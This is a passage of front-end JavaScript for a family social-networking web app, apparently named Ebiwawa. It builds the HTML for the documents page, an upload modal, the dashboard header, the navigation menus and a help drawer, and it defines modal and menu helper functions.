                    <!-- Documents & Media — gated behind FEATURES.documents.
                         Documents feature is deferred for the invite-only launch.
                         Flip the flag at top of app.js to re-expose. -->
                    ${FEATURES.documents ? `
                    <div class="mt-6 bg-white rounded-lg shadow-md p-6">
                        <div class="flex items-center justify-between mb-4">
                            <h3 class="text-xl font-semibold">Documents & Media</h3>
                            <button onclick="openModal('upload-media-modal')" class="btn btn-primary">Upload File</button>
                        </div>
                        <div id="media-list" class="space-y-3"></div>
                    </div>
                    ` : ''}
                </div>
            `;
        }
        function DocumentsPage() {
            return `
                <div id="documents-view" data-view>
                    <!-- Header with Actions -->
                    <div class="flex items-center justify-between mb-6">
                        <h2 class="text-2xl font-semibold">Documents</h2>
                        <div class="flex items-center gap-3">
                            <!-- View Toggle -->
                            <div class="flex items-center bg-gray-100 rounded-md p-1">
                                <button onclick="setDocumentsView('grid')" id="view-grid-btn" class="px-3 py-1 rounded text-sm font-medium transition-colors">
                                    ${tablerIcon('layout-grid', { size: 16, preserveColor: true })}
                                </button>
                                <button onclick="setDocumentsView('list')" id="view-list-btn" class="px-3 py-1 rounded text-sm font-medium transition-colors">
                                    ${tablerIcon('list', { size: 16, preserveColor: true })}
                                </button>
                            </div>
                            <button onclick="openModal('upload-media-modal')" class="btn btn-primary">
                                + Upload
                            </button>
                        </div>
                    </div>

                    <!-- Search and Filter -->
                    <div class="mb-6 flex gap-3">
                        <div class="flex-1">
                            <input type="text" id="documents-search" placeholder="Search documents..."
                                   oninput="filterDocuments()"
                                   class="w-full px-4 py-2 border border-gray-300 rounded-md focus:ring-2 focus:ring-primary focus:border-transparent">
                        </div>
                        <select id="documents-type-filter" onchange="filterDocuments()" class="px-4 py-2 border border-gray-300 rounded-md">
                            <option value="">All Types</option>
                            <option value="pdf">PDF</option>
                            <option value="image">Images</option>
                            <option value="document">Documents</option>
                            <option value="spreadsheet">Spreadsheets</option>
                            <option value="other">Other</option>
                        </select>
                        <select id="documents-person-filter" onchange="filterDocuments()" class="px-4 py-2 border border-gray-300 rounded-md">
                            <option value="">All Documents</option>
                            <option value="user-level">My Documents</option>
                            <option value="shared-with-me">Shared with me</option>
                        </select>
                    </div>

                    <!-- Grid View -->
                    <div id="documents-grid" class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 xl:grid-cols-4 gap-4" style="display: none;">
                    </div>

                    <!-- List View -->
                    <div id="documents-list" class="bg-white rounded-lg shadow-sm border border-gray-200">
                        <table class="w-full text-left">
                            <thead class="bg-gray-50 border-b border-gray-200">
                                <tr>
                                    <th class="p-4 font-semibold">Document</th>
                                    <th class="p-4 font-semibold">Attached To</th>
                                    <th class="p-4 font-semibold">Type</th>
                                    <th class="p-4 font-semibold">Uploaded</th>
                                    <th class="p-4 font-semibold">Actions</th>
                                </tr>
                            </thead>
                            <tbody id="documents-table-body"></tbody>
                        </table>
                    </div>
                </div>
            `;
        }
        function UploadMediaModal(personId = null) {
            const personOptions = appState.personsInTree.map(p => `<option value="${p.id}">${escapeHtml(p.first_name)} ${escapeHtml(p.last_name)}</option>`).join('');
            return `
                <div id="upload-media-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-lg p-8 space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300">
                        <h2 class="text-2xl font-bold">Upload Document or Media</h2>
                        <form id="upload-media-form" class="space-y-4">
                            <input type="hidden" id="media-person-id" value="${personId || ''}">
                            <div><label for="media-title" class="text-sm font-medium text-text-secondary">Title</label><input id="media-title" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md"></div>
                            <div><label for="media-description" class="text-sm font-medium text-text-secondary">Description</label><textarea id="media-description" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md"></textarea></div>
                            ${!personId ? `<div><label for="media-attach-person" class="text-sm font-medium text-text-secondary">Attach to Person (Optional)</label><select id="media-attach-person" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md"><option value="">-- None (My Documents) --</option>${personOptions}</select></div>` : ''}
                            <div><label for="media-file" class="text-sm font-medium text-text-secondary">File</label><input id="media-file" type="file" required class="w-full px-3 py-2 mt-1"></div>
                            <div id="upload-media-error" class="text-sm text-center text-error"></div>
                            <div class="flex justify-end pt-4 space-x-4">
                                <button type="button" onclick="closeModal('upload-media-modal')" class="btn btn-secondary">Cancel</button>
                                <button type="submit" class="btn btn-primary">Upload</button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function DashboardPage(user) {
            const displayName = user.displayName || user.email || 'User';
            return `
                <div id="dashboard-view" data-view>
                    <header id="app-header" class="ebw-app-header sticky top-0 z-40 flex items-center justify-between gap-2 p-3 md:p-4 shadow-md bg-surface">
                        <!-- LEFT slot: identity. On web this preserves the pre-2c.2
                             behavior — horizontal wordmark at md+, icon-only below.
                             On native (body.ebw-native) the icon-mobile is hidden
                             and the wordmark shows unconditionally (main.css). -->
                        <div class="logo-container" onclick="navigateToView('feed-view')">
                            <img src="ebiwawa-logo.svg" alt="Ebiwawa" class="hidden md:block logo-image">
                            <img src="ebiwawa-icon.png" alt="Ebiwawa" class="md:hidden logo-icon ebw-logo-icon-web">
                            <img src="ebiwawa-logo.svg" alt="Ebiwawa" class="ebw-logo-wordmark-native md:hidden">
                        </div>

                        <!-- CENTER slot. On web at md+ this is the desktop search
                             bar (unchanged). On web mobile it's the search
                             magnifier (unchanged pre-2c.2). On native it's the
                             app-title slot — empty on Feed, section name on
                             other tabs — populated by _updateNativeAppTitle. -->
                        <div class="hidden md:flex flex-1 max-w-md mx-8 ebw-header-desktop-search">
                            <form onsubmit="handleSearch(event)" class="flex gap-2 w-full">
                                <input
                                    type="text"
                                    id="global-search-input"
                                    placeholder="Search people, posts, events..."
                                    class="flex-1 px-4 py-2 text-sm border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary focus:border-transparent"
                                    minlength="3"
                                />
                                <button
                                    type="submit"
                                    class="px-4 py-2 text-sm font-semibold text-white rounded-md bg-primary hover:bg-opacity-90"
                                    title="Search">
                                    🔍 Search
                                </button>
                            </form>
                        </div>

                        <!-- Web mobile: legacy centered search magnifier. Hidden
                             on native (body.ebw-native) so the center reads as
                             either empty (Feed) or an app title. -->
                        <button onclick="toggleMobileSearch()" class="md:hidden p-2 text-gray-600 hover:bg-gray-100 rounded-lg ebw-header-web-mobile-search" title="Search">
                            🔍
                        </button>

                        <!-- Native only: app-title slot. Populated per view by
                             _updateNativeAppTitle. Center-aligned via absolute
                             positioning so it doesn't fight the flex layout when
                             the wordmark and right cluster have different widths. -->
                        <div id="header-app-title" class="ebw-header-app-title" aria-live="polite"></div>

                        <!-- RIGHT slot: actions + identity. -->
                        <div class="flex items-center gap-2 md:space-x-4">
                            <!-- Native-only: search icon lives in the right
                                 cluster so the center can be empty (Feed) or
                                 hold an app title. Reuses toggleMobileSearch
                                 which slides down the search input strip. -->
                            <button onclick="toggleMobileSearch()" class="ebw-header-search-native p-2 min-h-[44px] min-w-[44px] text-gray-600 hover:bg-gray-100 active:bg-gray-200 rounded-lg" title="Search" aria-label="Search">
                                ${tablerIcon('search', { size: 22 })}
                            </button>
                            <!-- Quick photo upload — icon-only in the header so
                                 the label doesn't read as generic "upload
                                 anything". Tooltip carries the meaning. The
                                 data-quick-upload-btn marker lets the F22
                                 upload-progress swap find this specific button
                                 during handleQuickUploadSubmit. -->
                            <button data-quick-upload-btn onclick="handleQuickUploadClick()" class="hidden sm:inline-flex items-center justify-center w-10 h-10 rounded-md text-gray-600 hover:bg-gray-100 hover:text-primary transition-colors" title="Upload a photo" aria-label="Upload a photo">
                                ${tablerIcon('camera', { size: 22 })}
                            </button>
                            <!-- Session 2c.1 #2: header avatar taps into Profile. -->
                            <button type="button" onclick="navigateToView('profile-view')" aria-label="Open profile" title="Profile" class="flex items-center gap-2 md:space-x-3 min-h-[44px] rounded-md hover:bg-gray-100 active:bg-gray-200 px-1 md:px-2 py-1 transition-colors">
                                <div id="header-avatar" class="w-8 h-8 md:w-10 md:h-10 rounded-full bg-gray-200 flex items-center justify-center overflow-hidden pointer-events-none">
                                    ${tablerIcon('user-circle', { size: 20 })}
                                </div>
                                <span class="hidden sm:inline text-sm md:text-base text-text-secondary pointer-events-none">${displayName}</span>
                            </button>
                            <button onclick="logout()" class="hidden sm:block px-3 md:px-4 py-2 text-xs md:text-sm font-semibold text-gray-700 bg-gray-200 rounded-md hover:bg-gray-300">Logout</button>
                            <!-- Mobile menu button -->
                            <button onclick="toggleMobileMenu()" class="md:hidden p-2 text-gray-600 hover:bg-gray-100 rounded-lg" title="Menu">
                                ${tablerIcon('menu-2', { size: 20 })}
                            </button>
                        </div>
                    </header>

                    <!-- Mobile Search Bar (collapsible) -->
                    <div id="mobile-search" class="hidden md:hidden bg-surface border-b p-3">
                        <form onsubmit="handleSearch(event)" class="flex gap-2">
                            <input
                                type="text"
                                id="mobile-search-input"
                                placeholder="Search..."
                                class="flex-1 px-4 py-2 text-sm border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary"
                                minlength="3"
                            />
                            <button type="submit" class="px-4 py-2 text-sm font-semibold text-white rounded-md bg-primary">
                                Go
                            </button>
                        </form>
                    </div>
                    <div class="flex relative">
                        <!-- Desktop Sidebar - Hidden on mobile -->
                        <aside class="hidden md:block w-64 h-screen p-4 bg-surface border-r">
                            <nav id="sidebar-nav" class="space-y-2">
                                <a href="#" onclick="navigateToView('feed-view'); return false;" data-nav="feed-view" class="sidebar-link flex items-center px-3 py-2 text-gray-600 rounded-md hover:bg-gray-100">${tablerIcon('home')}Feed</a>
                                <a href="#" onclick="navigateToFamilyTreeFromNav(); return false;" data-nav="family-tree-view" class="sidebar-link flex items-center px-3 py-2 text-gray-600 rounded-md hover:bg-gray-100">${tablerIcon('users')}Family Tree</a>
                                <a href="#" onclick="navigateToView('photo-albums-view'); return false;" data-nav="photo-albums-view" class="sidebar-link flex items-center px-3 py-2 text-gray-600 rounded-md hover:bg-gray-100">${tablerIcon('photo')}Photos</a>
                                ${FEATURES.documents ? `
                                <a href="#" onclick="navigateToView('documents-view'); return false;" data-nav="documents-view" class="sidebar-link flex items-center px-3 py-2 text-gray-600 rounded-md hover:bg-gray-100">${tablerIcon('file-text')}Documents</a>
                                ` : ''}
                                ${(FEATURES.documentOCR || FEATURES.audioTranscription) ? `
                                <a href="#" onclick="openModal('ai-tools-modal'); return false;" class="sidebar-link flex items-center px-3 py-2 text-purple-600 rounded-md hover:bg-purple-50">✨ AI Tools</a>
                                ` : ''}
                                <a href="#" onclick="navigateToView('chat-view'); return false;" data-nav="chat-view" class="sidebar-link flex items-center px-3 py-2 text-gray-600 rounded-md hover:bg-gray-100"><span class="relative inline-flex">${tablerIcon('message-circle')}<span class="ebw-chat-unread-dot hidden" aria-label="Unread messages"></span></span>Chat</a>
                                <a href="#" onclick="navigateToView('calendar-view'); return false;" data-nav="calendar-view" class="sidebar-link flex items-center px-3 py-2 text-gray-600 rounded-md hover:bg-gray-100">${tablerIcon('calendar')}Calendar</a>
                                <hr class="my-2 border-gray-200">
                                <a href="#" onclick="navigateToView('members-view'); return false;" data-nav="members-view" class="sidebar-link flex items-center justify-between px-3 py-2 text-gray-600 rounded-md hover:bg-gray-100">
                                    <span class="flex items-center">${tablerIcon('heart')}Family &amp; Connections</span>
                                    <span id="sidebar-pending-badge" class="hidden ml-2 inline-flex items-center justify-center text-xs font-semibold rounded-full bg-red-500 text-white min-w-[20px] h-5 px-1.5"></span>
                                </a>
                                <a href="#" onclick="navigateToView('profile-view'); return false;" data-nav="profile-view" class="sidebar-link flex items-center px-3 py-2 text-gray-600 rounded-md hover:bg-gray-100">${tablerIcon('user')}Profile</a>
                                <a href="#" onclick="handleQuickUploadClick(); return false;" class="sidebar-link flex items-center px-3 py-2 text-gray-600 rounded-md hover:bg-gray-100">${tablerIcon('camera')}Upload a photo</a>
                                <a href="#" onclick="openHelpDrawer(); return false;" class="sidebar-link flex items-center px-3 py-2 text-gray-600 rounded-md hover:bg-gray-100">❔ Help &amp; Glossary</a>
                                <!-- Quiet legal strip at the bottom of the
                                     sidebar — mirrors the mobile drawer's
                                     Privacy · Terms line. Reads as chrome,
                                     not nav. New-tab open so the app state
                                     stays intact. Inline margin-top same
                                     rationale as the mobile drawer: nav's
                                     space-y-2 utility would otherwise clamp
                                     to 8px which is not enough separation
                                     from Help and Glossary above. -->
                                <div style="margin-top: 32px;" class="pt-4 border-t border-gray-100 flex items-center justify-center gap-2 text-xs text-gray-400">
                                    <a href="/privacy" target="_blank" rel="noopener" class="hover:text-gray-600 py-1 px-2">Privacy</a>
                                    <span aria-hidden="true">·</span>
                                    <a href="/terms" target="_blank" rel="noopener" class="hover:text-gray-600 py-1 px-2">Terms</a>
                                </div>
                            </nav>
                        </aside>

                        <!-- Mobile Menu Overlay -->
                        <div id="mobile-menu-overlay" class="hidden md:hidden fixed inset-0 bg-black bg-opacity-50 z-40" onclick="toggleMobileMenu()"></div>

                        <!-- Mobile Drawer Menu. Each row: flex items-center
                             gap-3 min-h-[48px] py-3 px-3 with the icon as a
                             standalone flex item so the row gap actually
                             applies between icon and label (previously the
                             tablerIcon output was flush against label text
                             because the row lacked .sidebar-link and its
                             .ebw-icon margin-right didn't fire). Emoji
                             rows (AI Tools, Help) wrap the emoji in an
                             18px slot so their visual rhythm matches the
                             SVG rows exactly. ~80vw wide capped at 320px;
                             safe-area-bottom on the inner content so
                             Logout doesn't sit under the home indicator. -->
                        <aside id="mobile-menu" class="md:hidden fixed left-0 top-0 bottom-0 w-[80vw] max-w-[320px] bg-surface border-r transform -translate-x-full transition-transform duration-300 z-50 overflow-y-auto">
                            <div class="p-4 safe-area-bottom">
                                <div class="flex items-center justify-between mb-6">
                                    <h2 class="text-lg font-bold text-primary">Menu</h2>
                                    <button onclick="toggleMobileMenu()" class="p-2 hover:bg-gray-100 rounded-lg" aria-label="Close menu">
                                        ${tablerIcon('x', { size: 20, preserveColor: true })}
                                    </button>
                                </div>
                                <nav class="space-y-1">
                                    <a href="#" onclick="navigateToView('feed-view'); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-gray-700 rounded-md hover:bg-gray-100 active:bg-gray-200">
                                        ${tablerIcon('home')}<span>Feed</span>
                                    </a>
                                    <a href="#" onclick="navigateToFamilyTreeFromNav(); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-gray-700 rounded-md hover:bg-gray-100 active:bg-gray-200">
                                        ${tablerIcon('users')}<span>Family Tree</span>
                                    </a>
                                    <a href="#" onclick="navigateToView('photo-albums-view'); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-gray-700 rounded-md hover:bg-gray-100 active:bg-gray-200">
                                        ${tablerIcon('photo')}<span>Photos</span>
                                    </a>
                                    ${FEATURES.documents ? `
                                    <a href="#" onclick="navigateToView('documents-view'); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-gray-700 rounded-md hover:bg-gray-100 active:bg-gray-200">
                                        ${tablerIcon('file-text')}<span>Documents</span>
                                    </a>
                                    ` : ''}
                                    ${(FEATURES.documentOCR || FEATURES.audioTranscription) ? `
                                    <a href="#" onclick="openModal('ai-tools-modal'); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-purple-600 rounded-md hover:bg-purple-50 active:bg-purple-100">
                                        <span class="w-[18px] text-lg flex-shrink-0 flex items-center justify-center leading-none" aria-hidden="true">✨</span>
                                        <span>AI Tools</span>
                                    </a>
                                    ` : ''}
                                    <a href="#" onclick="navigateToView('chat-view'); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-gray-700 rounded-md hover:bg-gray-100 active:bg-gray-200">
                                        <span class="relative inline-flex flex-shrink-0">
                                            ${tablerIcon('message-circle')}
                                            <span class="ebw-chat-unread-dot hidden" aria-label="Unread messages"></span>
                                        </span>
                                        <span>Chat</span>
                                    </a>
                                    <a href="#" onclick="navigateToView('calendar-view'); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-gray-700 rounded-md hover:bg-gray-100 active:bg-gray-200">
                                        ${tablerIcon('calendar')}<span>Calendar</span>
                                    </a>
                                    <hr class="my-4 border-gray-200">
                                    <a href="#" onclick="navigateToView('members-view'); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-gray-700 rounded-md hover:bg-gray-100 active:bg-gray-200">
                                        ${tablerIcon('heart')}
                                        <span class="flex-1">Family &amp; Connections</span>
                                        <span id="mobile-pending-badge" class="hidden inline-flex items-center justify-center text-xs font-semibold rounded-full bg-red-500 text-white min-w-[20px] h-5 px-1.5 flex-shrink-0"></span>
                                    </a>
                                    <a href="#" onclick="navigateToView('profile-view'); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-gray-700 rounded-md hover:bg-gray-100 active:bg-gray-200">
                                        ${tablerIcon('user')}<span>Profile</span>
                                    </a>
                                    <a href="#" onclick="handleQuickUploadClick(); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-gray-700 rounded-md hover:bg-gray-100 active:bg-gray-200">
                                        ${tablerIcon('camera')}<span>Upload a photo</span>
                                    </a>
                                    <a href="#" onclick="openHelpDrawer(); toggleMobileMenu(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-gray-700 rounded-md hover:bg-gray-100 active:bg-gray-200">
                                        <span class="w-[18px] text-lg flex-shrink-0 flex items-center justify-center leading-none" aria-hidden="true">❔</span>
                                        <span>Help &amp; Glossary</span>
                                    </a>
                                    <a href="#" onclick="logout(); return false;" class="flex items-center gap-3 min-h-[48px] px-3 py-3 text-red-600 rounded-md hover:bg-red-50 active:bg-red-100">
                                        ${tablerIcon('door-exit')}<span>Logout</span>
                                    </a>
                                    <!-- Quiet legal strip below Logout — reads
                                         as chrome, not nav. New-tab open so
                                         the drawer state stays intact.
                                         Inline margin-top overrides the
                                         parent nav's space-y-1 utility
                                         (which would otherwise clamp the
                                         separation to 4px and let a stray
                                         tap catch Logout). -->
                                    <div style="margin-top: 32px;" class="pt-4 border-t border-gray-100 flex items-center justify-center gap-2 text-xs text-gray-400 safe-area-bottom">
                                        <a href="/privacy" target="_blank" rel="noopener" class="hover:text-gray-600 py-1 px-2">Privacy</a>
                                        <span aria-hidden="true">·</span>
                                        <a href="/terms" target="_blank" rel="noopener" class="hover:text-gray-600 py-1 px-2">Terms</a>
                                    </div>
                                </nav>
                            </div>
                        </aside>

                        <!--
                          min-w-0 releases the flex-child default
                          min-width:auto (=min-content) that lets tables,
                          <select>, and number/date inputs leak their
                          intrinsic width up to the app shell and push
                          the document past the viewport. overflow-x-clip
                          is a backstop that visually clips any residual
                          overflow without creating a new scroll container
                          (unlike overflow-x-hidden which would break
                          sticky positioning in descendants). See main.css
                          "App-shell width containment" for the full
                          descendant-shrink rule.

                          pb-[calc(5rem+env(safe-area-inset-bottom))] on
                          mobile keeps page content clear of both the
                          fixed bottom nav (5rem) and the iOS home
                          indicator / Android gesture bar (safe area).
                        -->
                        <main id="main-content" class="flex-1 min-w-0 overflow-x-clip p-3 md:p-8 pb-[calc(5rem+env(safe-area-inset-bottom))] md:pb-8"></main>
                    </div>

                    <!-- Help drawer (Tier 3 of the How-To stack). Slide-over
                         panel on the right that iframes /guide (members-only
                         glossary + how-tos) so users can browse without
                         leaving the app. Public /help is prospect-facing
                         and shorter; /guide is the members reference the
                         "Learn more in Help →" empty-state links target.
                         Backdrop click + Escape close. -->
                    <div id="help-drawer-backdrop" class="hidden fixed inset-0 bg-black bg-opacity-40 z-50 transition-opacity" onclick="closeHelpDrawer()"></div>
                    <aside id="help-drawer" class="fixed right-0 top-0 bottom-0 w-full max-w-md bg-white shadow-2xl transform translate-x-full transition-transform duration-300 z-50 flex flex-col" aria-hidden="true" aria-labelledby="help-drawer-title">
                        <div class="flex items-center justify-between p-4 border-b border-gray-200 flex-shrink-0">
                            <h2 id="help-drawer-title" class="text-lg font-semibold text-gray-800">Help & Glossary</h2>
                            <div class="flex items-center gap-2">
                                <a href="/guide" target="_blank" rel="noopener" class="text-sm text-primary hover:underline">Open in new tab ↗</a>
                                <button onclick="closeHelpDrawer()" class="p-2 hover:bg-gray-100 rounded-lg" aria-label="Close help">✕</button>
                            </div>
                        </div>
                        <iframe id="help-drawer-frame" title="Help & Glossary" class="flex-1 min-h-0 w-full border-0" src="about:blank"></iframe>
                        <!-- Bottom legal/meta strip. Subtle divider, quiet hint
                             color, sentence case, no icons. Legal links open
                             in a new tab so the user doesn't lose their spot
                             in the drawer. This is the always-reachable path
                             to the GDPR-relevant pages once the in-app
                             footer was removed. -->
                        <div class="border-t border-gray-100 px-4 py-3 flex flex-wrap items-center justify-center gap-x-4 gap-y-1 text-xs text-gray-400 flex-shrink-0">
                            <a href="/about" target="_blank" rel="noopener" class="hover:text-gray-600 hover:underline whitespace-nowrap">About</a>
                            <span aria-hidden="true">·</span>
                            <a href="/privacy" target="_blank" rel="noopener" class="hover:text-gray-600 hover:underline whitespace-nowrap">Privacy Policy</a>
                            <span aria-hidden="true">·</span>
                            <a href="/terms" target="_blank" rel="noopener" class="hover:text-gray-600 hover:underline whitespace-nowrap">Terms of Service</a>
                            <span aria-hidden="true">·</span>
                            <a href="mailto:privacy@ebiwawa.com" class="hover:text-gray-600 hover:underline whitespace-nowrap">privacy@ebiwawa.com</a>
                        </div>
                    </aside>

                    <!--
                         In-app footer intentionally omitted. Landing, auth,
                         and legal pages carry their own footers. Inside the
                         dashboard: Help drawer iframes /guide (whose own
                         footer links to Privacy / Terms), and Profile view's
                         "Privacy & Data" card exposes both "Download my
                         data" and "Delete my account" — full GDPR posture
                         reachable without an in-app footer.
                    -->

                    <!-- Mobile Bottom Navigation -->
                    <nav class="md:hidden fixed bottom-0 left-0 right-0 bg-surface border-t z-30 safe-area-bottom">
                        <div class="flex items-center justify-around h-16">
                            <button onclick="navigateToView('feed-view')" class="flex flex-col items-center justify-center flex-1 h-full text-gray-600 hover:text-primary active:bg-gray-100 transition-colors">
                                ${tablerIcon('home', { size: 22 })}
                                <span class="text-xs mt-1">Feed</span>
                            </button>
                            <button onclick="navigateToFamilyTreeFromNav()" class="flex flex-col items-center justify-center flex-1 h-full text-gray-600 hover:text-primary active:bg-gray-100 transition-colors">
                                ${tablerIcon('users', { size: 22 })}
                                <span class="text-xs mt-1">Tree</span>
                            </button>
                            <button onclick="navigateToView('photo-albums-view')" class="flex flex-col items-center justify-center flex-1 h-full text-gray-600 hover:text-primary active:bg-gray-100 transition-colors">
                                ${tablerIcon('photo', { size: 22 })}
                                <span class="text-xs mt-1">Photos</span>
                            </button>
                            <button onclick="navigateToView('chat-view')" class="flex flex-col items-center justify-center flex-1 h-full text-gray-600 hover:text-primary active:bg-gray-100 transition-colors">
                                <span class="relative inline-flex">
                                    ${tablerIcon('message-circle', { size: 22 })}
                                    <span class="ebw-chat-unread-dot hidden" aria-label="Unread messages"></span>
                                </span>
                                <span class="text-xs mt-1">Chat</span>
                            </button>
                            <button onclick="toggleMobileMenu()" class="flex flex-col items-center justify-center flex-1 h-full text-gray-600 hover:text-primary active:bg-gray-100 transition-colors">
                                ${tablerIcon('menu-2', { size: 22 })}
                                <span class="text-xs mt-1">More</span>
                            </button>
                        </div>
                    </nav>

                    <!-- Session 2c Task 5: offline banner. Only visible when
                         body.ebw-offline (set by native-shell's network listener).
                         Sits at top of viewport above header. -->
                    <div id="ebw-offline-banner" class="ebw-offline-banner">
                        <span>You're offline. Some features may not work.</span>
                    </div>

                    <!--
                        Session 2c Task 1: native tab bar. Hidden by default via
                        .ebw-native-tabbar { display: none } in main.css; only shown
                        when body.ebw-native class is set (from native-shell.js on
                        Capacitor). Web mobile continues to use the nav above.

                        Five slots: Feed / Tree / Add / Chat / Profile.
                        Add is a modal launcher — never shows active state.
                        Photos accessible from Feed's header pill (out of tab bar
                        per v2 IA decision). Family & Connections lives under Tree.
                        Calendar / Documents / Help / Logout live under Profile.
                    -->
                    <nav class="ebw-native-tabbar" role="navigation" aria-label="Primary">
                        <button data-tab="feed-view" onclick="ebwNavigateTab('feed-view')">
                            ${tablerIcon('home', { size: 22 })}
                            <span>Feed</span>
                        </button>
                        <button data-tab="family-tree-view" onclick="ebwNavigateTab('family-tree-view')">
                            ${tablerIcon('users', { size: 22 })}
                            <span>Tree</span>
                        </button>
                        <button class="tab-add" onclick="ebwNativeTabAdd()" aria-label="Add photo">
                            ${tablerIcon('camera', { size: 28 })}
                            <span>Add</span>
                        </button>
                        <button data-tab="chat-view" onclick="ebwNavigateTab('chat-view')">
                            <span class="relative inline-flex">
                                ${tablerIcon('message-circle', { size: 22 })}
                                <span class="ebw-native-tab-unread hidden" aria-label="Unread messages"></span>
                            </span>
                            <span>Chat</span>
                        </button>
                        <button data-tab="profile-view" onclick="ebwNavigateTab('profile-view')">
                            ${tablerIcon('user', { size: 22 })}
                            <span>Profile</span>
                        </button>
                    </nav>
                </div>
            `;
        }

        // --- CORE APP LOGIC ---

        // Mobile navigation functions
        function toggleMobileMenu() {
            const menu = document.getElementById('mobile-menu');
            const overlay = document.getElementById('mobile-menu-overlay');

            if (!menu || !overlay) return;

            const isOpen = !menu.classList.contains('-translate-x-full');

            if (isOpen) {
                // Close menu
                menu.classList.add('-translate-x-full');
                overlay.classList.add('hidden');
            } else {
                // Open menu
                menu.classList.remove('-translate-x-full');
                overlay.classList.remove('hidden');
            }
        }

        // Tier 3: Help drawer. Slides in a right-side panel that iframes
        // /guide (members-only glossary + how-tos; public /help is the
        // shorter prospect-facing page kept off the drawer per the F25
        // audience split). Lazy-sets src on open so the frame isn't
        // loaded until needed. Backdrop click + Escape key close.
        function openHelpDrawer() {
            // Session 2b Phase 1: on Capacitor Android, path-based navigation
            // like `/guide` in an iframe doesn't work — Capacitor's static
            // asset server returns index.html as fallback for unknown routes
            // (no cleanUrls rewrite equivalent). Result: iframe renders the
            // WHOLE app inside itself, creating an "app-in-app" nesting bug
            // where subsequent taps open more copies. Route to system browser
            // instead, matching the pattern used for /privacy /terms /about
            // (see services/native-shell.js legal-path routing).
            const isNativeApp = !!(window.Capacitor && window.Capacitor.isNativePlatform && window.Capacitor.isNativePlatform());
            if (isNativeApp) {
                // Dynamic import so @capacitor/browser stays out of the web bundle
                // hot path — only fetched on this specific tap on native.
                import('@capacitor/browser').then(({ Browser }) => {
                    Browser.open({
                        url: 'https://ebiwawa.com/guide',
                        presentationStyle: 'popover',
                    }).catch((err) => {
                        console.warn('[app] Help Browser.open failed:', err);
                    });
                });
                return;
            }
            const drawer = document.getElementById('help-drawer');
            const backdrop = document.getElementById('help-drawer-backdrop');
            const frame = document.getElementById('help-drawer-frame');
            if (!drawer || !backdrop || !frame) return;
            if (frame.getAttribute('src') === 'about:blank' || !frame.getAttribute('src')) {
                frame.setAttribute('src', '/guide');
            }
            drawer.classList.remove('translate-x-full');
            drawer.setAttribute('aria-hidden', 'false');
            backdrop.classList.remove('hidden');
            document.body.style.overflow = 'hidden';
            if (!openHelpDrawer._escHandler) {
                openHelpDrawer._escHandler = (ev) => {
                    if (ev.key === 'Escape') closeHelpDrawer();
                };
                document.addEventListener('keydown', openHelpDrawer._escHandler);
            }
        }
        function closeHelpDrawer() {
            const drawer = document.getElementById('help-drawer');
            const backdrop = document.getElementById('help-drawer-backdrop');
            if (drawer) {
                drawer.classList.add('translate-x-full');
                drawer.setAttribute('aria-hidden', 'true');
            }
            if (backdrop) backdrop.classList.add('hidden');
            document.body.style.overflow = '';
            if (openHelpDrawer._escHandler) {
                document.removeEventListener('keydown', openHelpDrawer._escHandler);
                openHelpDrawer._escHandler = null;
            }
        }

        function toggleMobileSearch() {
            const searchBar = document.getElementById('mobile-search');
            if (!searchBar) return;

            searchBar.classList.toggle('hidden');

            // Focus on input when opened
            if (!searchBar.classList.contains('hidden')) {
                const input = document.getElementById('mobile-search-input');
                if (input) {
                    setTimeout(() => input.focus(), 100);
                }
            }
        }

        function openModal(modalId) {
            const modal = document.getElementById(modalId);
            if(modal) {
                // iOS Safari defers paint on elements whose visibility just
                // flipped — transitions then only fire after the user's next
                // scroll/tap. Two nested requestAnimationFrames guarantee at
                // least one full paint of the "off" state before we flip to
                // "on", so the transition animates reliably.
                modal.classList.remove('pointer-events-none');
                requestAnimationFrame(() => {
                    requestAnimationFrame(() => {
                        modal.classList.remove('opacity-0');
                        const inner = modal.querySelector('div > div');
                        if (inner) inner.classList.remove('translate-y-10');
                    });
                });

                // Lock body scroll (both x and y) so the page behind the
                // modal — FTV horizontal scroll bands, Members-table
                // overflow-x-auto, etc. — can't be swiped through the modal.
                // Reference-counted so nested modals don't double-restore.
                if (!openModal._openCount) openModal._openCount = 0;
                openModal._openCount++;
                if (openModal._openCount === 1) {
                    document.body.dataset.savedOverflow = document.body.style.overflow || '';
                    document.body.style.overflow = 'hidden';
                }

                // Clear form when opening create-post modal
                if (modalId === 'create-post-modal') {
                    // Clear any previous state
                    selectedMixedMedia = [];
                    clearAllPhotos();
                    clearVideo();

                    const form = document.getElementById('create-post-form');
                    if (form) form.reset();

                    const errorDiv = document.getElementById('create-post-error');
                    if (errorDiv) errorDiv.textContent = '';

                    // Hide media preview containers
                    const mediaPreview = document.getElementById('media-preview-container');
                    if (mediaPreview) mediaPreview.classList.add('hidden');

                    const photosPreview = document.getElementById('photos-preview-container');
                    if (photosPreview) photosPreview.classList.add('hidden');

